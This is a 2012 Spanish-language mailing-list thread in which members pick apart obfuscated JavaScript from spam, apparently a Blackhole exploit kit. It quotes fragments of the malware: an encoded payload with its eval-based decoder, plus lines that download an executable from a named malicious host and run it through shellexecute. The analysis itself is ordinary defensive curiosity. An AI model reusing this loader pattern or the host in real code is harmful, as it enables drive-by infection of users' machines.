[uylug-varios] ataques curiosos

Pedro Worcel pedro at worcel.com
Wed Oct 10 18:38:07 PDT 2012 

Copiando el codigo y pegandolo en google, parece que se trata de un
blackhole exploit kit!

https://www.google.co.nz/search?q=pdfver+%3D+pdfver.split%28%27.%27%29&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=firefox-nightly

Aca hay un pdf<http://www.google.co.nz/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0CDYQFjAD&url=http%3A%2F%2Fwww.sophos.com%2Fen-us%2Fmedialibrary%2FPDFs%2Ftechnical%2520papers%2Fsophosblackholeexploitkit.pdf%3Fdl%3Dtrue&ei=xiB2UOyNKeW0iQfOroGYBg&usg=AFQjCNGhR2wjkJTPWwAG5qrcMSJLxsqa0Q&cad=rja>respecto
al tema, que no puedo leer porque se supone estoy trabajando :P
Hay unos chabones que los crean, y despues la gente compra el software y lo
distribuye por sus propios medios.


¡pah! qué socotroco de código. La mayor parte parece tener que ver con
> verificar la presencia de algún plugin del navegador. Pero al final baja
> algo e intenta ejecutarlo en un shell:
>
> var ra4 = ".//..//757736c.exe"
> [...]
> ra2.open("GET",
> "http://2.cmisdfoundation.com/links/persons_jobs.php?rhrvax=350a360337&eus=080b330306060b06020a&jgic=04&xwagghbf=phuaee&fbt=knoifmkz"<http://2.cmisdfoundation.com/links/persons_jobs.php?rhrvax=350a360337&eus=080b330306060b06020a&jgic=04&xwagghbf=phuaee&fbt=knoifmkz>,
> false);
> [...]
> with(ra1) {
>                 shellexecute(ra4);
>             }
>
> ¿es posible hacer esto desde javascript? ¿bajar un ejecutable y ejecutarlo
> desde un shell?
>
> saludos
>
> Kenneth
>

Estas personas -- locos de mierda -- parecen pensar que si:

http://stackoverflow.com/questions/10186813/how-to-run-cmd-exe-with-parameters-from-javascript
http://stackoverflow.com/questions/3152482/running-exe-from-javascript

Es raro, porque shellexecute no esta definido en el codigo que estamos
viendo, y los ejemplos en stack overflow estan en mayusculas. Quizas ese
GET este agregando un elemento al DOM que contenga la funcion shellexecute?

Un abrazo!
Pedro

El 11 de octubre de 2012 14:20, Carlos M. Martinez <
carlosmarcelomartinez at gmail.com> escribió:

>  Hace otras cosas tambien, que aparentemente involucran ActiveX, pero no
> lo segui a fondo.
>
> Muy bueno lo de Pedro :-)
>
> ~C.
>
> On 10/10/12 9:07 PM, Kenneth Irving wrote:
>
>
> ¡pah! qué socotroco de código. La mayor parte parece tener que ver con
> verificar la presencia de algún plugin del navegador. Pero al final baja
> algo e intenta ejecutarlo en un shell:
>
> var ra4 = ".//..//757736c.exe"
> [...]
> ra2.open("GET",
> "http://2.cmisdfoundation.com/links/persons_jobs.php?rhrvax=350a360337&eus=080b330306060b06020a&jgic=04&xwagghbf=phuaee&fbt=knoifmkz"<http://2.cmisdfoundation.com/links/persons_jobs.php?rhrvax=350a360337&eus=080b330306060b06020a&jgic=04&xwagghbf=phuaee&fbt=knoifmkz>,
> false);
> [...]
> with(ra1) {
>                 shellexecute(ra4);
>             }
>
> ¿es posible hacer esto desde javascript? ¿bajar un ejecutable y ejecutarlo
> desde un shell?
>
> saludos
>
> Kenneth
>
> On Thu, 11 Oct 2012, Pedro Worcel wrote:
>
> Hola gente!
>
> Aprovecho este post para presentarme, soy Pedro, estoy programando ahora
> en Nueva Zelanda pero me crie en Mercedes, y estudie en la
> UTU. Me paso mi viejo un link de esta conversacion me parecio interesante
> y ahora me anote para UYLUG. Tambien me anote un poco porque
> me impresiono que se vaya a organizar un evento a nivel Latinoamericano de
> la OWASP en Montevideo, muy groso.
>
> La verdad que no entiendo como codifica el malware el javascript, pero no
> hace falta saberlo porque al final el mismo lo decodifica y
> lo manda a un eval.
>
> Para poder trabajar con el lo descargue desde la linea de comandos y lo
> edite con vim. Reemplace todas las ocurrencias de eval por
> console.log y luego copie los contenidos de el firebug en el pastebin y lo
> hice mas lindo.
>
> El codigo del malware esta aca:
>
> http://pastie.org/5032658
>
> Y adjunto el malware, segun yo, neutralizado. (no garantizo nada eh)
>
> Saludos!
> Pedro
>
> ---------- Mensaje reenviado ----------
> De: Kenneth Irving <ken at fq.edu.uy> <ken at fq.edu.uy>
> Fecha: 10 de octubre de 2012 19:25
> Asunto: [uylug-varios] ataques curiosos
> Para: UYLUG <uylug-varios at uylug.org.uy> <uylug-varios at uylug.org.uy>
>
>
>
> Hace un tiempo que de tanto en tanto recibo spam que parece diverso (el
> último era un boletín de noticias trucho de CNN), pero que
> termina siempre en algo parecido. Son emails que siempre tienen algún link
> que te baja un HTML que contiene en su interior 3 o 4 links
> que te bajan un código Javascript, que lo único que hace es bajar algún
> otro archivo, este sí un HTML que contiene el código malicioso
> en javascript.
>
> Paso el link final para bajar el código malicioso de javascript:
>
>  http://2.cmisdfoundation.com/links/persons_jobs.php
>
> y trascribo sólo parte del código. El código comienza con esto:
>
> ------------------------- comienzo ---------------------------------
> <html><head><title></title></head><body><div
> dqa="asd"></div><script>dd="div";asd=function(){a=a.replace(/[^012a-z3-9]/g,"");}</script><div
> 58="16#31193r341e*34393m1e36!3f333l3j18^193t3t3331_3k33381836$193r3t3i35(3k3l3i3e10 at 321v331e36&393i3j3k23+38393c341q%3e3l3c3c3t)1c3j353k2j#3k3
>
>
> p3c351q*363l3e333k!393f3e1832^1c37193r3m_313i10361t$321e3j3k3p(3c351c311c at 341c331t3k&38393j1r39+3618361616%37193r363f)3i18311t1g#1r311s371e*3
>
> c353e373k!381r311t31^"
> 44="!38253m353e^3k18123f3e_121b341c33$193t353c3j(353r321t31 at 2r123f3e12
> &1b342t1r31+2r123f3e12%1b342t1t35)1e3n393e28#313e343c35*3i18331c32!193t3t3t3t^1c3n393e28_313e343c35$3i1q363l3e(333k393f3e at 18341c3319&3r3i353k3l+3i3e10363l%3e333k393f)3e18193r34#18191r3936*1
>
> 83k3p3g35!3f3610331t^1t12363l3e_333k393f3e$12"
> 49="42e3f34 at 353j2r382t
> &1r3k3i3p3r+331e3i353d%3f3m352338)393c341837#193t33313k*3338183619!3r3t3t3t39^361833193r_3k3i3p3r34$1e34393m1e(3i353d3f3m at 352338393c&341833193t+33313k3338%1836193r3t)3t3t3t3936#1811341e34*393m193r31!1t343f333l^3d3
>
> 53e3k1e_37353k253c$353d353e3k(223p293418 at 341e34393m&2924191r39+361831"
> 22="!18331c3219^3t3t3t3t1c_393e393k2j$333i393g3k(1q363l3e33 at 3k393f3e18
> &193r3m313i+10331t3k38%393j1c311t)3e313m3937#313k3f3i1c*351t121f12!1c361c391t^311e3l3j35_3i2137353e$3k3s3s1212(1c371t311e at 3m353e343f&3i3s3s12
>
> 12+1c321t311e%3g3c313k36)3f3i3d3s3s#12121c381t*311e3g3i3f!343l333k3s^3s12121r33_1e393e393k$2f"
>
> ------------------------ [código cortado] ---------------------------
>
> El bloque de datos codificados continúa, y el archivo termina con esto:
> ------------------------ [continuación] -----------------------------
>  65="53i)23313j3518#191e3i353g*3c31333518
> !1f2s3j1f37^1c1212191r_3h1t361b37$1b17103n39(343k381t12 at 171b3b1e3g&3c3l37393e+2j393q351b%1712103835)3937383k1t#12171b3b1e*3g3c3l3739!3e2j393q
>
>
> 35^1b17121017_1r3h1b1t17$3j3k3p3c35(1t12171b39 at 1b1734393j&3g3c313p1q+393e3c393e%351r121017)1r363f3i18#3f1t1g1r3f*1s321e3c35"></div><script>
>
> if(020==0x10)a=document.getElementsByTagName(dd)[1];
> s="";
> for(i=0;;i++){
>         if(window.document)r=a.getAttribute(i);
>         if(r){s=s+r;}else break;
> }
> a=s;
> asd();
> s="";
> for(i=0;i<a.length;i+=2){
>         s+=String.fromCharCode(parseInt(a.substr(i,2),32));
> }
> c=s;
> e=eval;
> try{if(020==0x10)("321".substr+"zxc")();}catch(gdsgdsg){e(c);}
>                 </script></body></html>
> -------------------- fin -------------------------------
>
> Esto lo paso sólo como muestra y para no publicar el socotroco completo.
> Es más práctico simplemente bajarlo desde el link original.
>
> Es obvio que el bloque de datos codificados e decodificado en el código
> javascript final, y luego de decodificarlo se ejecuta con el
> "e(c)".
>
> Imagino que debe tratarse de código javascript ofuscado para explotar
> alguna debilidad de algún navegador o algún cliente de email,
> pero mis pobres conocimientos de javascript no me han permitido
> decodificar esto sin riesgo, por lo que lo publico en esta lista, tal
> vez alguien con suficiente curiosidad pueda decodificarlo y hacernos saber
> de qué se trata. Es simplemente curiosidad, me resultó muy
> interesante el trabajo que se toman para ocultar el código malicioso.
>
> saludos
>
>  Kenneth
> _______________________________________________
> Uylug-varios mailing list
> Uylug-varios at listas.uylug.org.uy
> http://listas.uylug.org.uy/listinfo.cgi/uylug-varios-uylug.org.uy
>
>
> --
> http://is.gd/droope
>
>
>
>
> _______________________________________________
> Uylug-varios mailing listUylug-varios at listas.uylug.org.uyhttp://listas.uylug.org.uy/listinfo.cgi/uylug-varios-uylug.org.uy
>
>
>
> _______________________________________________
> Uylug-varios mailing listUylug-varios at listas.uylug.org.uyhttp://listas.uylug.org.uy/listinfo.cgi/uylug-varios-uylug.org.uy
>
>
>
> _______________________________________________
> Uylug-varios mailing list
> Uylug-varios at listas.uylug.org.uy
> http://listas.uylug.org.uy/listinfo.cgi/uylug-varios-uylug.org.uy
>
>


-- 
http://is.gd/droope <http://is.gd/signature_>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://listas.uylug.org.uy/pipermail/uylug-varios-uylug.org.uy/attachments/20121011/5010e26a/attachment-0002.htm>

More information about the Uylug-varios mailing list